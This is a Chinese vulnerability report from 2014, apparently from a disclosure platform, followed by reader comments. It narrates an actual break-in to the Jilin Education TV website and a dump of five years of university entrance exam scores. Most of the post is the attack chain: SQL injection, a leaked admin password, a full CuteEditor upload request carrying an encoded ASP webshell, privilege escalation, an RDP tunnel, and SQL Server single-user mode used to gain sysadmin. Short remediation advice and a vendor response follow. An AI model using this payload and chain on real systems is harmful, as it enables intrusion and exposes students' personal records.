吉林教育电视台后台getshell可提权拖库致2010-2014年5年高考成绩泄露

先是前台一个SQL注入：

http://**.**.**.**/program_show_list.aspx?nid=11811

nid参数过滤不严，用sqlmap跑出后台用户名密码

admin

jugaohuang^$

后台地址

http://**.**.**.**/admin

进去之后发现几个图片上传点都对文件类型进行了限制，看了看编辑器，用的是CuteEditor

CuteEditor前几天刚爆出的脚本上传漏洞，在IIS6下可以getshell

POST http://**.**.**.**/CuteSoft_Client/CuteEditor/uploader.ashx?_Addon=xhttp&_AddonGuid=e7d8104a-0ba6-4b47-8285-59d442e2b7d3&_PartialStart=0&_PartialFileName=1.asp; HTTP/1.1
 Content-Length: 28
  
 PCVldmFsIHJlcXVlc3QoImEiKSU+

POST过去之后得到小马

http://**.**.**.**/uploadertemp/uploading.e7d8104a-0ba6-4b47-8285-59d442e2b7d3.1.asp;.resx?a=response.write%28%22hehe%22%29

用菜刀连接，上传大马

巴西烤肉提权

添加管理用户后发现3389端口没有开，修改注册表把3389打开

蛋疼的是3389被墙了，换成21什么的也不行

然后想到用reDuh建立http隧道

隧道建立成功，用远程桌面连接**.**.**.**:1234可进行操作

打开 SQL Server Management Studio发现没有权限。。。 -_-!

在cmd中执行 net stop mssqlserver 停掉MSSQL

再执行 C:/Program Files/Microsoft SQL Server/MSSQL10.MSSQLSERVER/MSSQL/Binn/sqlserver.exe /m /f 启用单用户模式

打开SSMS新建查询，这时Windows身份认证已经可以用了

执行以下代码：

--创建登录名
 CREATE LOGIN [jletv-sql/ASP.NET] FROM WINDOWS;
 GO
 
 --赋予登录名的权限为sysadmin
 USE master
 GO
 EXEC [sys].[sp_addsrvrolemember] @loginame = 'jletv-sql/ASP.NET', -- sysname
     @rolename = sysadmin -- sysname

把当前用户加到SQL Server中，得到了数据库权限，拖库成功

10-14年的高考考生成绩，录取信息都可以查得到

前台的SQL注入要加强过滤

编辑器的问题：向[CuteEditor]CuteEditor.b::f(string):string方法定义的非法字符列表中添加分号

最重要的是要重视网站的安全

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2014-07-09 22:01

厂商回复：

CNVD确认并复现所述情况(仅复现第一层风险)，已经转由CNCERT下发给吉林分中心处置。按多个风险点及信息泄露风险评分，rank 16

最新状态：

暂无

1. 2014-07-05 17:56 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子， 但是除了他华...)

   0

   电视台跟高考成绩有什么关系？

   1# 回复此人

2. 2014-07-05 18:14 | 老迷糊飞侠 ( 路人 | Rank:24 漏洞数:2 | 菜鸟一枚。。)

   0

   @魇 高考成绩可以在这个电视台的网站上查到

   2# 回复此人

3. 2014-07-05 18:41 | IT偏执狂 ( 路人 | Rank:6 漏洞数:3 | 禁锢我们的究竟是什么？)

   0

   这样也可以。。

   3# 回复此人

4. 2014-07-05 18:46 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

   0

   ——、我觉得太不科学了。。

   4# 回复此人

5. 2014-07-05 18:47 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

   0

   这样也可以。。

   5# 回复此人

6. 2014-07-05 23:13 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

   0

   有点略屌。。。JJFLY...

   6# 回复此人

7. 2014-07-06 00:13 | Rinima ( 路人 | Rank:0 漏洞数:1 )

   0

   这种类似的貌似还真挺多。而且貌似都已经被……了

   7# 回复此人

8. 2014-07-06 10:20 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

   0

   我觉得你这个玩的有的过头了

   8# 回复此人

9. 2014-08-19 18:12 | 中国公民 ( 路人 | Rank:25 漏洞数:12 | 脱裤不提交，提交不脱裤)

   0

   把当前用户加到SQL Server中，得到了数据库权限，拖库成功 在cmd中执行 net stop mssqlserver 停掉MSSQL 这两句话吓死我了。

   9# 回复此人

10. 2014-08-19 18:13 | by灰客 ( 路人 | Rank:26 漏洞数:14 | ‮)

    0

    你们为毛都去玩它- -顺便求一份

    10# 回复此人

11. 2014-08-19 20:32 | 小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)

    0

    学习了。。。

    11# 回复此人

12. 2014-08-19 20:43 | Tixe ( 路人 | Rank:2 漏洞数:1 )

    0

    好吧！无聊……

    12# 回复此人

13. 2014-08-19 20:54 | 浩森 ( 路人 | Rank:30 漏洞数:6 )

    0

    这是在挖洞？这尼玛就是脱裤啊 ，洞主还活着么

    13# 回复此人

14. 2014-08-19 21:53 | phantomer ( 路人 | Rank:10 漏洞数:5 | 菜比一个。求勿喷。)

    0

    是脱裤拖偏了吧。。。哈哈`(*∩_∩*)′

    14# 回复此人

15. 2014-08-19 22:23 | 瓦解° ( 路人 | Rank:12 漏洞数:5 | web渗透学习小菜一枚。)

    0

    洞主的奇淫技巧真不少。。

    15# 回复此人

16. 2014-08-20 07:59 | 树上草 ( 路人 | Rank:20 漏洞数:8 | <img height="12" width="12" style="verti...)

    0

    咳咳，是不是该把裤子丢出来了

    16# 回复此人

17. 2014-08-22 04:42 | 小小丶 ( 路人 | Rank:2 漏洞数:2 | 小小酱油一个。)

    0

    啊啊 我也拿下了 开始在乌云没号 提交360 只给我 3积分 感觉坑死了

    17# 回复此人